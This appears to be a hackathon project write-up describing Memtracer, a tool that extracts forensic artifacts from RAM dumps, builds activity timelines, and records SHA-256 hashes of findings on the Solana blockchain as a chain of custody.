Memtracer

Dashboard

Inspiration

Volatile memory (RAM) often contains some of the most critical forensic evidence, such as credentials, active network connections, running processes, and encryption artifacts, but it is also one of the most fragile and underutilized sources of digital evidence. Once a system is powered down, this information is lost forever, and even after extraction, proving the integrity of memory-derived evidence can be difficult.

We were inspired by the challenges digital forensic investigators face when analyzing memory dumps at scale and maintaining a trustworthy chain of custody. Existing tools can extract artifacts, but they often overwhelm analysts with raw data and lack clear mechanisms to verify that evidence has not been altered after analysis.

Memtracer was built to make volatile memory forensics more accessible, interpretable, and trustworthy by combining automated analysis with verifiable evidence integrity.

What It Does

Memtracer is a digital forensics platform that analyzes RAM dumps to automatically extract and organize investigative artifacts, then anchors those findings on the Solana blockchain to provide a tamper-proof chain of custody.

Memtracer can:

Extract and analyze printable strings from memory dumps
Detect forensic artifacts such as:
URLs and network indicators
Email addresses
Suspicious command history
Running process identifiers
Cryptographic indicators (e.g., private key markers, wallet artifacts)
Reconstruct an approximate timeline of activity from volatile memory
Assign confidence scores to detected artifacts
Cryptographically hash forensic findings and record them on Solana for verification

By transforming raw memory data into a structured timeline and verifiable audit trail, Memtracer helps investigators quickly understand what happened on a system and prove that their findings remain unaltered.

How We Built It

Memtracer is built as a modular forensic pipeline with a clear separation between analysis, visualization, and evidence integrity.

Memory Analysis Pipeline We begin by ingesting a memory dump and extracting printable strings from raw binary data. These strings are analyzed using regex-based detection and heuristic rules to identify forensic artifacts such as URLs, emails, suspicious commands, process names, and cryptographic indicators. Each artifact is tagged with a category and confidence score.

To improve interpretability, detected artifacts are ordered and grouped into an approximate activity timeline, allowing investigators to reason about sequences of events rather than isolated indicators.

Artifact Integrity & Chain of Custody Rather than storing sensitive forensic data on-chain, Memtracer hashes each detected artifact using SHA-256 and records the hash along with metadata on the Solana blockchain. This creates an immutable audit log that allows investigators or third parties to verify that forensic findings have not been modified since analysis.

Solana’s fast confirmation times and low transaction costs make it well-suited for logging many small evidence events efficiently.

Frontend Dashboard The frontend provides a simple interface for uploading memory dumps, exploring extracted artifacts, and visualizing timelines. Investigators can filter artifacts by type and clearly see how volatile memory evidence maps to system activity.

Challenges We Ran Into

So many compatibility issues with Python tools that connected to Solana and other related libraries, etc. and so much redownloading and deleting and version compatibility checking
Solana will only take data through a “map” called an IDL, and the forensic_chain.json file (the “map”) had to be extremely precise

Accomplishments We’re Proud Of

Building a working end-to-end memory forensics pipeline within a 36-hour hackathon
Automatically transforming raw RAM dumps into structured, readable investigative timelines
Designing a blockchain-backed chain of custody that meaningfully improves evidence integrity
Integrating Solana in a way that directly supports real-world forensic workflows
Delivering a clear, demoable product rather than a purely conceptual tool

What We Learned

We learned a great deal about digital forensics and the unique challenges involved in analyzing volatile memory, which proved to be an extremely valuable experience. Working with raw RAM dumps highlighted how unstructured and noisy memory data can be, and how much careful filtering and contextual analysis are required to extract meaningful forensic artifacts.

From a technical perspective, we gained hands-on experience designing heuristic-based detection systems, reconstructing investigative timelines without explicit timestamps, and balancing accuracy with interpretability. We also learned the importance of presenting forensic results in a clear, human-readable way, as insights are only useful if investigators can quickly understand and trust them.

Integrating Solana taught us how blockchain technology can be applied beyond financial use cases. By using it as a lightweight integrity and provenance layer, we saw how decentralized systems can strengthen trust, auditability, and chain-of-custody guarantees in real-world forensic workflows.

Finally, we learned the value of scope discipline and team coordination in a 36-hour hackathon environment and what is critical to delivering a working, impactful project.

What’s Next for Memtracer

Our long-term vision is for Memtracer to become a trusted platform for volatile memory forensics, helping investigators uncover critical evidence while maintaining transparency, integrity, and trust throughout the investigative process.